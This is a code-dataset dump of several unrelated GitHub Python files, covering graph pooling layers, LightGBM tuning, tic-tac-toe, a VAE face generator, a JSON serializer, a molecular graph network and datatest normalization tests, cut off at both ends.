values[int(self.k*num_nodes):], idx[int(self.k*num_nodes):]\n\n return ret, values1, idx1, idx0, h_n1\n\n\nclass GraphPool(nn.Module):\n\n def __init__(self, in_dim, g=False):\n super(GraphPool, self).__init__()\n self.g = g\n if self.g:\n self.down_gcn = GCN(in_dim, in_dim)\n \n def forward(self, A, X, idx, idx_=None, value=None, initlayer=False):\n if self.g:\n X = self.down_gcn(A, X)\n\n new_x = X[idx,:]\n score = torch.unsqueeze(value, -1)\n new_x = torch.mul(new_x, score)\n\n if initlayer:\n A = self.removeedge(A, idx)\n return new_x, A\n else:\n return new_x\n\n def removeedge(self, A, idx):\n A_ = A[idx,:]\n A_ = A_[:,idx]\n return A_\n\n \n\nclass GraphUnpool(nn.Module):\n\n def __init__(self, in_dim):\n super(GraphUnpool, self).__init__()\n self.up_gcn = GCN(in_dim, in_dim)\n\n def forward(self, A, X, idx):\n\n new_X = torch.zeros([A.shape[0], X.shape[1]]).to(X.device)\n new_X[idx] = X\n new_X = self.up_gcn(A, new_X)\n return new_X","repo_name":"limaosen0/GXN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"22483337693","text":"\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\nfrom lightgbm import LGBMClassifier\r\nimport lightgbm as lgb\r\nfrom toad.metrics import KS, F1, AUC\r\n\r\nfrom sklearn.metrics import roc_curve\r\nimport pandas as pd\r\nimport numpy as np\r\nimport 
logging\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.charts import Bar, Grid, Line\r\n# 日志管理\r\nlogger_name = \"lgbm\"\r\nlogger = logging.getLogger(logger_name)\r\nlogger.setLevel(logging.DEBUG)\r\nlogger.info('test')\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\n\r\ndef init_feature(x_train, y_train):\r\n X, Y = x_train, y_train\r\n lgbm_model = LGBMClassifier(\r\n learning_rate=0.05,\r\n n_estimators=500,\r\n max_depth=4,\r\n min_split_gain=0.01,\r\n min_child_samples=20,\r\n subsample=1,\r\n colsample_bytree=1,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_param = lgbm_model.get_params()\r\n lgbm_train = lgb.Dataset(X, Y)\r\n lgbm_param.pop('silent')\r\n lgbm_param.pop('n_estimators')\r\n\r\n '''使用交叉验证的方式确定最优的树数量'''\r\n cvresult = lgb.cv(lgbm_param, lgbm_train, num_boost_round=100, nfold=4, metrics=['auc','binary_logloss'], early_stopping_rounds=100)\r\n best_n_estimators = len(cvresult['auc-mean'])\r\n print('确定最优的树数量', best_n_estimators)\r\n\r\n lgbm_model.set_params(n_estimators=best_n_estimators)\r\n # lgbm_model.fit(X,Y,eval_metric='auc')\r\n lgbm_model.fit(X, Y, eval_metric=['auc', 'binary_logloss'])\r\n\r\n feat_imp = pd.Series(lgbm_model.feature_importances_, index=X.columns)\r\n feat_imp = feat_imp.sort_values(ascending=False)\r\n\r\n valid_feature_num = len(np.where(feat_imp > 0)[0]) # 有效变量是有feature_importance的变量(在lgbm树模型中有贡献的变量,其他的变量没有用到)\r\n print('有效变量数为{0}个'.format(valid_feature_num))\r\n\r\n return feat_imp\r\n\r\n\r\n\r\n# from sklearn import svm, datasets\r\n# from sklearn.model_selection import GridSearchCV\r\n# iris = datasets.load_iris()\r\n# parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}\r\n# svc = svm.SVC()\r\n# clf = GridSearchCV(svc, parameters,scoring='roc_auc',cv=4)\r\n# clf.fit(iris.data[0:100], iris.target[0:100])\r\nparameters={'num_leaves':[i for i in range(10,50,1)],\r\n 'max_depth':[2,3,4,5,6],\r\n 'learning_rate':[0.001,0.003,0.005]+[i/100 for i in range(1,11)],\r\n 'n_estimators':range(100,500,2),\r\n 'min_split_gain':[i/100 for i in range(0,10,1)],\r\n 'min_child_weight':[0.001,0.003,0.005,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09],\r\n 'min_child_samples':[i for i in range(10,50,1)],\r\n 'subsample':[i/10 for i in range(6,11)],\r\n 'colsample_bytree':[i/10 for i in range(6,11)],\r\n 'reg_alpha':[i/100 for i in range(0,200,1)],\r\n 'reg_lambda':[i/10 for i in range(70,200,1)]\r\n }\r\n\r\ndef grid_search(parameters,x_train, x_test, y_train, y_test):\r\n best_auc = 0\r\n for num_leaves in parameters['num_leaves']:\r\n for max_depth in parameters['max_depth']:\r\n for learning_rate in parameters['learning_rate']:\r\n for n_estimators in parameters['n_estimators']:\r\n # for min_split_gain in parameters['min_split_gain']:\r\n # for min_child_weight in parameters['min_child_weight']:\r\n # for min_child_samples in parameters['min_child_samples']:\r\n # for subsample in parameters['subsample']:\r\n # for colsample_bytree in parameters['colsample_bytree']:\r\n # for reg_alpha in parameters['reg_alpha']:\r\n # for reg_lambda in parameters['reg_lambda']:\r\n # logger.info('{},{},{},{},{},{},{},{},{},{},{}'.format(num_leaves,\r\n # max_depth,\r\n # learning_rate,\r\n # n_estimators,\r\n # min_split_gain,\r\n # min_child_weight,\r\n # min_child_samples,\r\n # subsample,\r\n # colsample_bytree,\r\n # reg_alpha,\r\n # reg_lambda\r\n # ))\r\n lgbm_model = LGBMClassifier(\r\n num_leaves=num_leaves,\r\n max_depth=max_depth,\r\n learning_rate=learning_rate,\r\n n_estimators=n_estimators,\r\n # 
min_split_gain=min_split_gain,\r\n # min_child_weight=min_child_weight,\r\n # min_child_samples=min_child_samples,\r\n # subsample=subsample,\r\n # colsample_bytree=colsample_bytree,\r\n # reg_alpha=reg_alpha,\r\n # reg_lambda=reg_lambda,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_model.fit(x_train, y_train, eval_metric='auc')\r\n preds = lgbm_model.predict(x_test)\r\n auc = AUC(preds,y_test)\r\n if auc>best_auc:\r\n best_auc = auc\r\n logger.info('test auc:{}'.format(best_auc))\r\n best_para = lgbm_model.get_params()\r\n return best_para\r\n\r\n\r\n\r\ndef py_overlap(feature,cut_list,train_cnt_rate,oot_cnt_rate,train_due_rate,oot_due_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_rate\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_rate\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n\r\n line = (\r\n Line()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_due\",\r\n train_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_due\",\r\n oot_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n )\r\n\r\n overlap_1 = bar.overlap(line)\r\n overlap_1.render_notebook()\r\n return overlap_1\r\n\r\n\r\n\r\n\r\n\r\ndef xw_bar(feature,cut_list,train_cnt_rate,oot_cnt_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return bar\r\n\r\n\r\n\r\ndef xw_line(feature,cut_list,train_due_rate,oot_due_rate):\r\n line = (\r\n Line()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return line\r\n\r\n","repo_name":"xingweihappyer/credit-card","sub_path":"lgbm_tuner.py","file_name":"lgbm_tuner.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40309053165","text":"from print_board import *\nfrom random import randrange\nfrom functools import partial\ntext = partial(print, sep='', end=\"\\n\\n\")\n\ndef play(board, turn, u_icon, b_icon, round, bot):\n\n choice = ''\n\n print_board(board, round)\n\n if turn == \"user\":\n\n good = False\n while not good:\n good = True\n text(bot,\": Your turn! 
Which place (0-8) would you like to play?\")\n            choice = input(\"--> \")\n            if choice not in board or (choice == 'X' or choice == 'O' or not choice):\n                text(bot,\": That's not an option, sorry.\")\n                good = False\n\n        board[board.index(choice)] = u_icon\n        \n    else:\n        \n        while choice not in board: # while choice is not an option\n            choice = str(randrange(0,9)) # generate choice (0-8); randrange's upper bound is exclusive\n        text(bot,\": My turn! I'll pick... \",choice,\"!\")\n\n        board[board.index(choice)] = b_icon\n\n    return check_for_win(board)\n\ndef check_for_win(board):\n\n    # check for horizontal win\n    i = 0\n    while i < 9: # look through rows 0-2, 3-5, and 6-8\n        if board[i] == board[i + 1] and board[i] == board[i + 2]:\n            return board[i]\n        i += 3\n\n    # check for vertical win\n    i = 0\n    while i < 3: # look through columns 0;3;6, 1;4;7, and 2;5;8\n        if board[i] == board[i + 3] and board[i] == board[i + 6]:\n            return board[i]\n        i += 1\n\n    # check for diagonal win\n    if board[0] == board[4] and board[0] == board[8]:\n        return board[0]\n    elif board[2] == board[4] and board[2] == board[6]:\n        return board[2]\n\n    for b in board:\n        if b != 'X' and b != 'O': # compare by value, not identity\n            return '' # return blank if no winner yet and there are still open spaces\n\n    return 'C' # return C if no winner yet and there are NOT still open spaces","repo_name":"meganmcadams/tik-tac-toe","sub_path":"Sources/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
{"seq_id":"7021341509","text":"# -*- encoding: utf-8 -*-\n'''\n@Author : {Yixu}\n@Contact : {xiyu111@mail.ustc.edu.cn}\n@Software: PyCharm\n@File : VAE_Genarate_face.py\n@Time : 6/11/2019 7:05 PM\n'''\n'''\nThe GAN results were not good, so this version uses a VAE instead; a fully connected decoder may be tried later.\n'''\n\nfrom read_data import read_img\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,4,5\"\n\n\nclass VAE_net(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE_net, self).__init__() # inherit attributes from the parent class\n\t\tlatent_size = 64\n\t\tn_channel = 3\n\t\tn_feature = 128\n\t\tLATENT_CODE_NUM = 64 # size of the VAE latent code\n\n\t\tself.Decoder_net = nn.Sequential(nn.ConvTranspose2d(latent_size, 4 * n_feature, kernel_size=4, bias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(4 * n_feature), # input 64*1*1\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(4 * n_feature, 2 * n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(2 * n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(2 * n_feature, n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature, n_feature // 2, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 2),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 2, n_feature // 4, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 4),\n\t\t\t\t\t\t\t\t\t\t 
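# feature maps are 64x64 at this point; the final deconv below outputs 3*128*128\n\t\t\t\t\t\t\t\t\t\t 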
nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 4, n_channel, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.Sigmoid(), # output 3*128*128\n\t\t\t\t\t\t\t\t\t\t ).cuda()\n\n\t\tself.Encoder_cal_u = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_o = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_add_u_o = nn.Linear(LATENT_CODE_NUM, 64 * 1 * 1).cuda() #???\n\n\t\tself.Encoder_net = nn.Sequential(\n\t\t\tnn.Conv2d(n_channel, n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(n_feature), # input 128*128*3\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 4 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(4 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(4 * n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 1 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(1 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(1 * n_feature, LATENT_CODE_NUM, kernel_size=4), # output 64 * 1 * 1\n\t\t).cuda()\n\n\tdef reparameterize(self, mu, logvar):\n\t\teps = torch.randn(mu.size(0), mu.size(1)).cuda() #\n\t\tz = mu + eps * torch.exp(logvar / 2)\n\t\treturn z.cuda()\n\n\tdef forward(self, img):\n\t\tpred1, pred2 = self.Encoder_net(img), self.Encoder_net(img)\n\t\tmu = self.Encoder_cal_u(pred1.view(pred1.size(0), -1)) # get\n\t\tlogvar = self.Encoder_cal_o(pred2.view(pred2.size(0), -1)) # get\n\t\tz = self.reparameterize(mu, logvar)\n\t\tadd_u_o = self.Encoder_cal_add_u_o(z).view(z.size(0), 64, 1, 1)\n\t\toutput = self.Decoder_net(add_u_o) # get\n\t\treturn output.cuda(), mu.cuda(), logvar.cuda()\n\nvae = VAE_net()\n\nif torch.cuda.device_count() > 1:\n\tvae = nn.DataParallel(vae)\n\tvae = vae.cuda()\n\ndef loss_func(recon_x, x, mu, logvar):\n\t# BCE = F.binary_cross_entropy(recon_x, x, size_average=False)\n\t# KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\t# return BCE + KLD\n\tcriterion = torch.nn.MSELoss()\n\tl2_loss = criterion(recon_x, x)\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\treturn l2_loss + KLD\n\n# Parallel Computing\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\nif __name__ == '__main__':\n\tfile_dir = \"/home1/yixu/yixu_project/CVAE-GAN/download_script/download\"\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\tcuda = True if torch.cuda.is_available() else False\n\tTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ????\n\tdata = read_img.get_file(file_dir)\n\tdata = data.to(device)\n\n\tdataloader = DataLoader(data, batch_size=64, shuffle=True)\n\n\n\t# for this time decoder is genarate\n\t# (self, in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True,dilation=1, padding_mode='zeros'):\n\t# output=(input-1)*stride+output_padding -2*padding+kernel_size\n\n\t# not same as up\n\t# output=(input-kernel_size+2*Padding)/stride + 1\n\n\tdef weights_init(m):\n\t\tif type(m) in [nn.ConvTranspose2d, nn.Conv2d]:\n\t\t\tnn.init.xavier_normal_(m.weight)\n\t\telif type(m) == nn.BatchNorm2d:\n\t\t\tnn.init.normal(m.weight, 
1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\t\telif type(m) == nn.Linear:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\n\n\t#\n\t#vae.Decoder_net.apply(weights_init)\n\t#vae.Encoder_net.apply(weights_init)\n\t#vae.Encoder_cal_add_u_o.apply(weights_init) # ???\n\t#vae.Encoder_cal_o.apply(weights_init)\n\t#vae.Encoder_cal_u.apply(weights_init)\n\n\tfixed_noise = torch.randn(64, 64, 1, 1).cuda() # fix it as one\n\tepoch_num = 4000\n\n\tfor epoch in range(epoch_num):\n\t\tfor batch_idx, data in enumerate(dataloader):\n\t\t\t# get data\n\t\t\timg = data.cuda()\n\t\t\tbatch_size = img.size(0)\n\t\t\ttotal_loss = 0\n\t\t\toptimizer.zero_grad()\n\t\t\trecon_img, mu, logvar = vae.forward(img)\n\n\t\t\tloss = loss_func(recon_img, img, mu, logvar)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tif batch_idx == 1:\n\t\t\t\t#fake_img = vae.Decoder_net(fixed_noise).cuda()\n\t\t\t\tfake_img = vae.module.Decoder_net(fixed_noise).cuda()\n\t\t\t\t# path = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE/images_epoch{:02d}_batch{:03d}.jpg'.format(epoch,batch_idx)\n\t\t\t\tpath = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE_l2loss/images_epoch{:02d}_batch{:03d}.jpg'.format(\n\t\t\t\t\tepoch, batch_idx)\n\t\t\t\tsave_image(fake_img, path, normalize=True)\n\n\t\t\tprint('[{}/{}]'.format(epoch, epoch_num) +\n\t\t\t\t '[{}/{}]'.format(batch_idx, len(dataloader)) +\n\t\t\t\t 'loss:{:g}'.format(loss))\n","repo_name":"MasterXiYu/CVAE-GAN","sub_path":"demo/VAE_Genarate_face.py","file_name":"VAE_Genarate_face.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"27946305433","text":"try:\n import ujson as json\nexcept BaseException:\n import json\nfrom .SerializerBase import SerializerBase\n\n\nclass SerializerUJson(SerializerBase):\n\n def dumps(self, obj, sort_keys=False, indent=False):\n return json.dumps(obj, ensure_ascii=False, sort_keys=sort_keys, indent=indent)\n\n def loads(self, s):\n if isinstance(s, bytes):\n s = s.decode('utf-8')\n return json.loads(s)\n","repo_name":"ahussein/core9","sub_path":"JumpScale9/data/serializers/SerializerUJson.py","file_name":"SerializerUJson.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39271514878","text":"import torch\nimport torch.nn as nn\n\nfrom modules.conv_layer import GraphConv\nfrom modules.attention import AttentionLayer\nimport pdb\n\n\nclass MolConvNet(nn.Module):\n def __init__(self, args, use_attn=False):\n super(MolConvNet, self).__init__()\n self.args = args\n self.use_attn = use_attn\n\n self.conv_layer = GraphConv(args)\n self.output_size = args.hidden_size\n\n if self.use_attn:\n self.attn_layer = AttentionLayer(args)\n self.output_size += args.hidden_size\n\n def forward(self, mol_graph, stats_tracker=None):\n graph_inputs, scope = mol_graph.get_graph_inputs()\n atom_h = self.conv_layer(graph_inputs)\n\n attn_context = None\n if self.use_attn:\n attn_context = self.attn_layer(atom_h, scope)\n if attn_context is not None:\n atom_h = torch.cat([atom_h, attn_context], dim=1)\n\n return atom_h\n","repo_name":"benatorc/PA-Graph-Transformer","sub_path":"models/mol_conv_net.py","file_name":"mol_conv_net.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"18"} +{"seq_id":"18717421157","text":"\"\"\"Tests for normalization 
functions.\"\"\"\nimport sqlite3\nfrom . import _unittest as unittest\nfrom datatest.requirements import BaseRequirement\nfrom datatest._utils import IterItems\n\nfrom datatest._normalize import TypedIterator\nfrom datatest._normalize import _normalize_lazy\nfrom datatest._normalize import _normalize_eager\nfrom datatest._normalize import normalize\n\ntry:\n import squint\nexcept ImportError:\n squint = None\n\ntry:\n import pandas\nexcept ImportError:\n pandas = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass TestNormalizeLazyUnchanged(unittest.TestCase):\n \"\"\"Test objects that should be returned unchanged.\"\"\"\n def test_nonexhaustible_iterable(self):\n data = [1, 2, 3]\n self.assertIs(_normalize_lazy(data), data)\n\n data = (1, 2, 3)\n self.assertIs(_normalize_lazy(data), data)\n\n def test_exhaustible_iterator(self):\n data = iter([1, 2, 3])\n self.assertIs(_normalize_lazy(data), data)\n\n def test_typediterator(self):\n data = TypedIterator(iter([1, 2, 3]), evaltype=tuple)\n self.assertIs(_normalize_lazy(data), data)\n\n\n@unittest.skipUnless(squint, 'requires squint')\nclass TestNormalizeLazySquint(unittest.TestCase):\n \"\"\"Test squint package's `Result` and `Query` objects.\"\"\"\n def test_sequence_result(self):\n result_object = squint.Result([1, 2, 3, 4], evaltype=list)\n normalized = _normalize_lazy(result_object)\n self.assertIs(normalized, result_object, msg='should return original object')\n\n def test_iteritems_result(self):\n result_object = squint.Result([('a', 1), ('b', 2)], evaltype=dict)\n normalized = _normalize_lazy(result_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_query_that_returns_sequence(self):\n query_object = squint.Query.from_object([1, 2, 3, 4])\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, squint.Result)\n self.assertEqual(normalized.evaltype, list)\n\n def test_query_that_returns_noncontainer(self):\n query_object = squint.Query.from_object([1, 2, 3, 4]).sum()\n normalized = _normalize_lazy(query_object)\n self.assertEqual(normalized, 10)\n\n def test_query_that_returns_mapping(self):\n query_object = squint.Query.from_object({'a': 1, 'b': 2})\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_select(self):\n \"\"\"Select objects should not be changed by normalization.\"\"\"\n select_object = squint.Select([['A'], [1], [2], [3], [4]])\n normalized = _normalize_lazy(select_object)\n self.assertIsInstance(normalized, squint.Select)\n\n\n@unittest.skipUnless(pandas, 'requires pandas')\nclass TestNormalizeLazyPandas(unittest.TestCase):\n def test_dataframe_with_rangeindex(self):\n \"\"\"DataFrames using a RangeIndex should be treated as sequences.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(df)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_dataframe_with_otherindex(self):\n \"\"\"DataFrames using other index types should be treated as mappings.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(df)\n\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def 
test_dataframe_multiple_columns(self):\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), data)\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_single_column(self):\n \"\"\"Single column DataFrame values should be unwrapped.\"\"\"\n data = [('x',), ('y',), ('z',)]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), ['x', 'y', 'z'])\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n df = pandas.DataFrame(\n data=[('x',), ('y',), ('z',)],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n df = pandas.DataFrame([('x',), ('y',), ('z',)], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(df)\n\n def test_series_with_rangeindex(self):\n \"\"\"Series using a RangeIndex should be treated as sequences.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(s)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_series_with_otherindex(self):\n \"\"\"Series using other index types should be treated as mappings.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(s)\n\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_series_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n s = pandas.Series(\n data=['x', 'y', 'z'],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(s)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_series_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n s = pandas.Series(['x', 'y', 'z'], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(s)\n\n\n@unittest.skipUnless(numpy, 'requires numpy')\nclass TestNormalizeLazyNumpy(unittest.TestCase):\n def test_two_dimentional_array(self):\n arr = numpy.array([['a', 'x'], ['b', 'y']])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 'x'), ('b', 'y')])\n\n def test_two_valued_structured_array(self):\n arr = numpy.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_two_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('a', 1), ('b', 2)],\n dtype=[('one', 
'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_one_dimentional_array(self):\n arr = numpy.array(['x', 'y', 'z'])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_structured_array(self):\n arr = numpy.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_three_dimentional_array(self):\n \"\"\"Three-dimentional array normalization is not supported.\"\"\"\n arr = numpy.array([[[1, 3], ['a', 'x']], 